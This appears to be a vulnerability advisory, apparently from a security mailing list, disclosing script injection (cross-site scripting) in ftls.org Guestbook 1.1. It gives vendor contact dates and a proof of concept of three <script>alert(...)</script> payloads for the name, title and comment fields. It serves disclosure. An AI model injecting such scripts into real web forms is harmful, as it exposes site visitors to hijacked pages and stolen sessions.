ftls.org Guestbook 1.1 Script Injection Vulnerabilities
Discovered By BrainRawt (brainrawt (at) hotmail (dot) com [email concealed])

About MyGuestbook:
------------------
Your basic guestbook that can be downloaded at
http://www.ftls.org/en/examples/cgi/Guestbook.shtml#s1.

Vulnerable (tested) Versions:
--------------------
guestbook v 1.1

Vendor Contact:
----------------
9-27-02 - Emailed webmaster (at) ftls (dot) org [email concealed]
12-15-02 - Emailed tyndiuk (at) ftls (dot) org [email concealed]

Vulnerability:
----------------
guestbook.cgi inproperly filters user input making the guestbook
vulnerable to script injection.

Exploit (POC):
----------------
When filling in ones name use:
<script>alert('your_name_field_vuln_to_injection')</script>

When filling in the Title use:
<script>alert('title_field_vuln_to_injection')</script>

When filling in the Comment use:
<script>alert('comments_field_vuln')</script>

---------------------------------------------------------------------
Which looks better? Blackhat or White? You Decide! - BrainRawt

_________________________________________________________________
Protect your PC - get McAfee.com VirusScan Online
http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963

[ reply ]